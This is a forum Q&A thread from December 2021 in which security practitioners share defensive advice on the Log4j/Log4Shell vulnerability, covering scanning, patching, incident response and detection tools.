2021-12-13T05:32:00Z

What does the Log4j/Log4Shell vulnerability mean for your company?

EB
  • 5
  • 62
PeerSpot user
5

5 Answers

SimonClark - PeerSpot reviewer
Real User
Top 5Leaderboard
2021-12-14T09:39:07Z
Dec 14, 2021

This vulnerability is particularly critical because Log4j is widely used in open source and commercial software and remote exploitation of the vulnerability against any internet-facing server is trivial using a single HTTP post. Exploitation results in full system compromise. The vulnerability has a CVSS Score of 10 out of a possible 10 meaning it is as bad as it gets.


Our SOC has launched a new app that detects the presence of vulnerable versions of Log4j however, detecting it does not mean you have been exploited.


My advice: Scan your network to get a full visibility report i.e. find all your legacy and shadow IT that you didn't know existed which means you should find all potential instances of Log4j, patch all of the Log4J environments, monitor your systems 24/7 using your SOC and if you don't have a SOC invest in a Managed SOC provider. 

EB
Community Manager
Dec 14, 2021

@SimonClark thank you for your answer and for the advice!

PeerSpot user
Search for a product comparison in Application Security Tools
BH
Real User
2021-12-13T16:43:38Z
Dec 13, 2021

Yet another chance to test our incident response procedures. 


So far I would say we're a B. Good on the process, and an A on team response and interactions and reducing threat risk were about a B. 


ID'g your external assets exposed to this vulnerability is your teams' #1 priority and mitigate or patch (if available) the threat. 


You also have to notify and communicate with any 3rd party to make sure they're aware so they can start the same process. You ALSO need to be fully aware of your vendors' weaknesses and defenses (mitigations, patches, knowledge and reaction time). 


Then be prepared to roll out patches or in this case shut systems down OR put mitigations in place immediately to mitigate risk to the entire environment.

Jairo Willian Pereira - PeerSpot reviewer
Real User
Top 5
2021-12-13T11:53:51Z
Dec 13, 2021

One excellent opportunity for the company to test your CMDB/Inventory (at medium and big companies). 


Tenable, and I think, other Vulnerability Scanners offer a specific plugin used to check your infrastructure against Log4shell. 


If you don't have VS, you can try looking at your logging system for evidence or use:


https://buff.ly/3lYZRh0
https://gist.github.com/SwitHa...


In the future, Patch Mgmt pre-defined and applied schedules need to be first (proactive) from scanners/vulns. (reactive).

EB
Community Manager
Dec 15, 2021
PeerSpot user
VG
Real User
Top 5Leaderboard
2021-12-21T08:01:45Z
Dec 21, 2021

WhiteSource has released a utility to detect log4j vulnerability in the codebase. 


Take a look at this if it helps. In our case, a lot of projects use Elastic Search and Azure DevOps Server - both of them have log4j being used and that's where additional fixes have to be done.


https://github.com/whitesource/log4j-detect-distribution

EB
Community Manager
Dec 21, 2021

@reviewer1572348 what have you been doing or what do you recommend to mitigate the issue? 

PeerSpot user
EB
Community Manager
2021-12-14T07:41:29Z
Dec 14, 2021

Hello @Jangsun KIM, @Cuneyt KALPAKOGLU Phd. , @reviewer1572348, @Nachu Subramanian, @Letsogile-Baloi, @Nagaraj Sheshachalam, @Nadeem Syed, @reviewer1362132, @Chiheb Chebbi ​and @Abbasi Poonawala,


Can you please join this discussion and share your advice with the community?


Thank you!

Find out what your peers are saying about Sonar, Veracode, Checkmarx and others in Application Security Tools. Updated: March 2024.
767,496 professionals have used our research since 2012.
Application Security Testing (AST)
Application Security Testing (AST) solutions are used to identify and fix security vulnerabilities in software applications. They can be used at all stages of the software development lifecycle, from development to testing to deployment.
Download Application Security Testing (AST) ReportRead more

Related Q&As